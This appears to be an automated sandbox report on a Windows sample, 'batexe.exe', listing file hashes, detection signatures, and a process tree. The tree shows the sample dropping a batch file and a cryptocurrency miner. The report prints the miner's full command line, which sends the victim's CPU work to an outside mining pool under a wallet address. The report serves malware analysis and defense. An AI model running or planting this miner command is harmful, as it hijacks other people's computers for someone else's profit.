73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 22:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3576	b2e.exe
4300	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5472 wrote to memory of 3576	5472	batexe.exe	85
PID 5472 wrote to memory of 3576	5472	batexe.exe	85
PID 5472 wrote to memory of 3576	5472	batexe.exe	85
PID 3576 wrote to memory of 936	3576	b2e.exe	86
PID 3576 wrote to memory of 936	3576	b2e.exe	86
PID 3576 wrote to memory of 936	3576	b2e.exe	86
PID 936 wrote to memory of 4300	936	cmd.exe	89
PID 936 wrote to memory of 4300	936	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5472
- C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DC0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe

Filesize
1.5MB

MD5
9e6260f26ea689fed3591094ce614e74

SHA1
08d3964851e033a4e3c3f3f11d8338519796c579

SHA256
9e671f7e80c88157a40b7b711c27b753b4d12d69b7ecc9d41e9054336b5e6b11

SHA512
92f9aae211c4146821820835a221ad68b18027588a7b7d2c4856b8f580c8546e1a3fce3ed16dfe6191e01ab19811e857224cfaf730a4f8ad48d4ac370ecf875f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe

Filesize
3.4MB

MD5
33ad7360852299e3602d0fd0052917bb

SHA1
64b87884854717033aa04fddcb699bc3e2b237e0

SHA256
47def0b43bc59e3f9dd28cd6a765e82f53d56cd1db538e76b308ed26d543e6d0

SHA512
251d54c3ccc9a5c8ca2dd848c99fb19a3f707f491123a8107c7f3555bf72df5a44012192f77e8f6fd0019e377e706763cc31e118087c35efad3ea1901c4af80d

Download Submit
C:\Users\Admin\AppData\Local\Temp\2EFA.tmp\b2e.exe

Filesize
2.7MB

MD5
7b3e106b68646d4807c9ebf090122a4e

SHA1
ef4cc4828420f356a32a5389523d5b44c74b14c5

SHA256
5e40661b7d42c3b9f7553fa0e744d62871621a9aec61712c71496b6e18b9795f

SHA512
e2e1e90fc5b403e71a2d28bc8a49c85e5f6190b8425b431e0db0e8c40da8ccf13b68a0e2829fc60d296e132651bd06767a27e31cdcf400d0328a71519cbd3dbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\3DC0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
786KB

MD5
5e34683b27e41c9eaeed8b050765550d

SHA1
c44063a44540ea324856c4ee8616c204190d3be6

SHA256
21ff133e65181835e71501b46b84425f926d11c94eaef26cf19fc65c584e9695

SHA512
7785aadb2c38d06a371f709e128d0b1bc660667d905ea89f8b7843633ba62817ccf1c9a313f930853974d6c0d8c0260a49f14c1abf81a135c06230b143560083

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
578KB

MD5
df3bfe84d7bbc3b0d379180b101a8cc4

SHA1
e00db36aaf1d74b811514244aa872586b8736a69

SHA256
7e7bef62762e1eeb6efc0ac2e5dcb25ae7e9a46fbbca1dbe062f942ad3f70ead

SHA512
d48fe64e955036b9cca14e6c0dd7ec220cd337b28ff614f2458cc3bc7f5fe1a663c0d588178dd4e3cd1b1a13b1c9866561ffd889eb7a266a7128ba7b7b786216

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
553KB

MD5
a0592ac854d388d651582eb101df0d15

SHA1
d82e7935d365a5b04cf30799dfce1e27ef035954

SHA256
ad533bea3b718cc1f385cfae1740b970f3453ce77d6c6f48cfa11c27cadd4a67

SHA512
0dfa5274a2b920f8f11dfeb4093035b8d5d6a3361f3700c37a6bac1af43431177712d0da652f4a11c53e6018dff63c790a7d806ba67c1441e282361f01f285b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
632KB

MD5
00346b0e83c8e30b2159ca04f7f25d98

SHA1
9022ce2bfc60beca048171449d04b333c146903d

SHA256
9f45c910a8e080e454a04467a29cee9adbdb78f554833dadc1299a70632697b5

SHA512
e296f7fe0857311580f093c11c285348bf76eb1000e4806662dd2942837f1a5354184182897279b3a0b40ab7f605f1f93ea82536bfe0812baa8ff20ca709b9ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
361KB

MD5
1c785d4b3e752489a6f5718f180bee10

SHA1
ead8eac218bac24a4c0dc2a3e5a92a4b10e5deaf

SHA256
681dd090f223f5042aeb59ef1c44ea0c0aad7a3bfee33e611be828aa18e571da

SHA512
ef170560ea0705603422a92b78e3ba6ebb53b8390f74df3f39d18a965ebabc031a862e71ba3300b0b447240ef050197da8839ed05aafa58ec800734f10d586b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
531KB

MD5
4ad4f170e26399de3d0e828149043865

SHA1
e46ac5badda8865eb8a8c6bf8ee40bb806eb809f

SHA256
87e14ac69faa5386c3bdb882d6f9b90109875301fcba61b418ad10691fb1ff34

SHA512
b5f6fec539d3c8ee4de6d4caa0f2673383e7c1dd3db28067036499d76f16eeeffe3d40842825cfb76a9250975dc5380605a17db86042c636eeeeac921cf63c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
648KB

MD5
89c9ee1255ebd7d5f888b1f8b266553e

SHA1
d7b4cf1443040bd2ad421d5e58124e79a0da5b40

SHA256
907fa754b8913f64c1f44c0dca4430f8744e89afc5eb1154c3781e02c606867c

SHA512
02a35ad50f081268c1f222eefe1a890ec9366c29c166b2f803acc359c6714e09c1645619e14b8238db8098321f1ae65829b5e9f10ee7db5a26859f22ba5a127b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
647KB

MD5
1d1f75978f1a1b8b5e98450b217b0fe2

SHA1
067992fae1e406af09cc9da1049123c189e6fd3e

SHA256
c058af7c85d7a28182e84015a8fab98d2f3123fbd1c9338ab449c605d1d748c5

SHA512
3fc2e3f1eb3494f257661c7a664435613a7616a995b3324e8779978c92341b95c9482324a3f3a94c56d28879d7c17602669b899d97f896297536c8f70a80a734

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
497KB

MD5
d317a65ead64007476cc5319e75bf7f8

SHA1
de5c2592870373990c136c5e3512c44880838584

SHA256
93e2923188b14f4b1e22e0babd3830e95a872eb2df60a963bfac4edab3899af0

SHA512
2630da608d86711148f7e376dbc22c9012c30a26ddd051f650b5e1d5c2296dfb2edc06a864b9057d9e2972dbab3872247e15cf6bbe1eb29d62ee457b5b830f59

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
538KB

MD5
6ea98e64c4a4daf85460c4959607f613

SHA1
cab94853f77980e782868d210ed7d47c931538fd

SHA256
8aff3fc422a63abdc61e026b875012bc52b8d0d1fcb23c89a69a944a84133e04

SHA512
5d9894339b94fb4de1bbfd4cfe69e045c6c1c3b43c65b16200b77e47c62229533396104f57ce27f587a896d8f3c531510fdd70fba5c6803057c9ef10c11bb857

Download Submit
memory/3576-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3576-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4300-47-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/4300-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-45-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/4300-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4300-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4300-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5472-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download